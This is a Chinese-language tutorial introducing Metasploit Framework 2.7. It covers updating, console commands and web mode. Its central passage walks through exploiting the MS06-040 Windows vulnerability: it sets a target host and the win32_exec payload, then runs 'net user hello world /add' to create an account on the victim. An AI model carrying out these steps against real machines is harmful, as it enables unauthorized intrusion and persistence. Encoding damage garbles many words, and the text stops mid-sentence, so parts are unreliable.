yukun525(
网学)贡献
Metasploit Framework 简介及使用说明
1
Metasploit Framework 简介及使用说明 [ Metasploit Framework 简介及使用说明 ] 1.简介 Metasploit Framework 是一个编写,测试和使用 exploit 代码的完善 环境。这个环境为渗透测试,shellcode 编写和漏洞研究提供了一个可 靠的平台,这个框架主要是由面向对象的 Perl 编程语言编写的,并带 有由 C 语言,汇编程序和 Python 编写的可选组件。 Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工 具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢 出漏洞和流行的 shellcode,并且不断更新,使得缓冲区溢出测试变得 方便和简单。 使用 Metasploit 安全测试工具在渗透测试中可以做很多事情,你可 以保存你的"柚?"∠睢⒆龊媚愕幕疃?日志、甚至定义每个有效负载在运 行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免 费的,它的开发团队由两个全职成员和少数兼职的投稿者组成 , Metasploit Framework 由最初的 1.0 版发展到现在的 3.0 版的漏洞自动 化探测,成绩骄人,精神可嘉! Metasploit 主页: metasploit 站掌握最新的架构以及漏洞利用的版本 你可以通过这个网
2
Metasploit
Framework
下
载
地
址
:
metasploit/projects/Framework/downloads.html(下载 所用操作系统支持的版本) Exploit 的 相 关 信
息:metasploit/projects/Framework/exploits.html 2.使用方法 本文以 Metasploit Framework 2.7 为例,简述它在命令模式下的使 用方法。 1).安装完成后运行 MSFUpdate 进行自动更新,如无更新将提示退 出程序。如有更新,当出现 Preserve modifications(yes or no)?时输入 "es"?行更新. 2).可以通过 MSFConsole 直接进入,也可以在 Cygshell 下输入 msfconsole 进入框架命令模式下.
3).使用命令"elp"蛟?""梢曰竦檬褂冒镏? 可以看到里面有如下的命令: "?"nbsp; "d"nbsp; "xit"nbsp; "elp"nbsp; "nfo"nbsp; :获取帮助。 :更换当前的
工作目录。 :退出。 :获取帮助。 :显示当前程序的相关信息。
3
"uit"nbsp;
:退出
程序。
"eload"nbsp; :再载入 Exploit 和 payloads。 "ave"nbsp; "etg"nbsp; :保存当前设置 :设置一个全局环境变量。
"nsetg"nbsp; :移除全局环境变量。 "how"nbsp; "se"nbsp; :显示可用的 Exploit 和 payloads。 :使用一个 Exploit。
"ersion"nbsp;:显示程序的版本。
例如使用 ms06040 这个漏洞,步骤如下(不唯一): ↓ show exploits //显示可用的 exploit,以 BSD 开头的是针对 BSD
系统的 ShellCode,以 Linx 开头的是
针对 Linux 系统的 ShellCode,以 CMD 和 WIN 开头的是针对 Windows 系统。 ‖ ↓ ‖ ↓ info netapi_ms06_040 use netapi_ms06_040 show options //查看这个 exploit 的相关信息 //使用这个 exploit
//显示这个漏洞利用的参数
set RHOST 192.168.1.11 //设置远程主机地址这个参数 show targets //显示 exploit 支持的操作系统类型 //设置目标为 0 所代表的那个操作
系统类型
set TARGET 0
show payloads //显示与正在使用的漏洞利用兼容的有效负载,说
4
白了 Payload 就是我们平时说的 ShellCode,不同的系统对不同的 ShellCode 要求是不一样。 set PAYLOAD win32_exec //设置有效载荷为执行特定命令 show options //显示相关参数
set CMD "et user hello world /add"nbsp; 添加一个帐号 set //检查环境设置
//设置要执行的命令为
check //检查目标是否存在相关漏洞
exploit
//检查无误后即可进行溢出了
4).web 模式下使用方法 运行 Msf
web.bat,在 IE 地址栏中输入 127.0.0.1:55555 即可 看到操作界面。 单击“select payload”选项进入 Payload 选择界面, 选择需要的 Payload 后就进入基本信息的设定界面,这里的设置和前面介绍的基本 一致,等都设定好后,点 Vulnerability Check 检查目标系统是否存在相应的漏